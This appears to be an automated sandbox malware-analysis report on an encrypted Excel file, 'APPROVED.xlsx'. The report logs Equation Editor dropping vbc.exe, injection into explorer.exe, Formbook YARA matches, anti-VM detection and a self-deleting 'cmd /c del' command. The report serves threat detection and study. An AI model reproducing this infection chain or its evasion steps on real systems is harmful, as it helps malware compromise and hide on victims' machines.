Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A2F3CF	11_2_02A2F3CF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A563DB	11_2_02A563DB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A32305	11_2_02A32305
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A7A37B	11_2_02A7A37B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A37353	11_2_02A37353
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A2E0C6	11_2_02A2E0C6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A5D005	11_2_02A5D005
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AAD06D	11_2_02AAD06D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A33040	11_2_02A33040
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A4905A	11_2_02A4905A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A34680	11_2_02A34680
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A3E6C1	11_2_02A3E6C1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AD2622	11_2_02AD2622
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A7A634	11_2_02A7A634
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A3C7BC	11_2_02A3C7BC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AB579A	11_2_02AB579A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A657C3	11_2_02A657C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A65485	11_2_02A65485
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A41489	11_2_02A41489
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AB443E	11_2_02AB443E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A6D47D	11_2_02A6D47D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AB05E3	11_2_02AB05E3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A4C5F0	11_2_02A4C5F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A3351F	11_2_02A3351F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A76540	11_2_02A76540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AE3A83	11_2_02AE3A83
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02ADCBA4	11_2_02ADCBA4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02ABDBDA	11_2_02ABDBDA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A2FBD7	11_2_02A2FBD7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A57B00	11_2_02A57B00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02ACF8EE	11_2_02ACF8EE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AAF8C4	11_2_02AAF8C4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A5286D	11_2_02A5286D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A3C85C	11_2_02A3C85C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A329B2	11_2_02A329B2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AD098E	11_2_02AD098E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A469FE	11_2_02A469FE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AB394B	11_2_02AB394B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AB5955	11_2_02AB5955
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A62E2F	11_2_02A62E2F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A4EE4C	11_2_02A4EE4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02ACCFB1	11_2_02ACCFB1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02AA2FDC	11_2_02AA2FDC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A40F3F	11_2_02A40F3F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A5DF7C	11_2_02A5DF7C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02ACFDDD	11_2_02ACFDDD
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A60D3B	11_2_02A60D3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A3CD5B	11_2_02A3CD5B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B493	11_2_0009B493
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B496	11_2_0009B496
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009C539	11_2_0009C539
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009C795	11_2_0009C795
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B8B1	11_2_0009B8B1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B954	11_2_0009B954
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00088C4B	11_2_00088C4B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00088C50	11_2_00088C50
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00082D89	11_2_00082D89
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00082D90	11_2_00082D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009CE85	11_2_0009CE85
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009BF12	11_2_0009BF12
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00082FB0	11_2_00082FB0

Source: APPROVED.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02A2DF5C appears 121 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02A9F970 appears 84 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02A7373B appears 245 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02A73F92 appears 132 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 02A2E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0093DF5C appears 129 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0098373B appears 248 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 009AF970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00983F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0093E2A8 appears 60 times

Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@17/7@7/7

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$APPROVED.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCF21.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...........................................2.........2.......2.....			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ......................2.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........`3........4.t...........0.......................&.................2.....			Jump to behavior

Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp	Binary or memory string: select EmployeeID from employeeattendance where EmployeeID=@findAUnable to delete..Already in use{select EmployeeID from employeepayment where EmployeeID=@finduselect EmployeeID from advanceentry where EmployeeID=@findwdelete from employeeregistration where EmployeeID=@DELETE1;

Source: APPROVED.xlsx

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: APPROVED.xlsx

Static file information: File size 1101944 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdb source: vbc.exe, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, explorer.exe
Source:	Binary string: explorer.pdb source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdbh source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp

Source: APPROVED.xlsx

Initial sample: OLE indicators vbamacros = False

Source: APPROVED.xlsx

Initial sample: OLE indicators encrypted = True

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037B5E4 push ebp; retf	4_2_0037B5E6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0037B5DA push ebp; retf	4_2_0037B5DC
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B2A2 push cs; ret	8_2_0041B2A3
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B3F2 push eax; ret	8_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B3FB push eax; ret	8_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B3A5 push eax; ret	8_2_0041B3F8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041B45C push eax; ret	8_2_0041B462
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00415414 push esp; ret	8_2_00415416
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00414F46 push cs; ret	8_2_00414F47
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0041BF12 push dword ptr [8427D5C5h]; ret	8_2_0041C1FF
Source: C:\Users\Public\vbc.exe	Code function: 8_2_00415FC5 push ebp; ret	8_2_00415FC6
Source: C:\Users\Public\vbc.exe	Code function: 8_2_0093DFA1 push ecx; ret	8_2_0093DFB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_02A2DFA1 push ecx; ret	11_2_02A2DFB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B2A2 push cs; ret	11_2_0009B2A3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B3A5 push eax; ret	11_2_0009B3F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B3FB push eax; ret	11_2_0009B462
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B3F2 push eax; ret	11_2_0009B3F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00095414 push esp; ret	11_2_00095416
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009B45C push eax; ret	11_2_0009B462
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_0009BF12 push dword ptr [8427D5C5h]; ret	11_2_0009C1FF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00094F46 push cs; ret	11_2_00094F47
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00095FC5 push ebp; ret	11_2_00095FC6

Source: initial sample

Static PE information: section name: .text entropy: 7.37315390636

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: APPROVED.xlsx

Stream path 'EncryptedPackage' entropy: 7.99980853948 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp, type: MEMORY
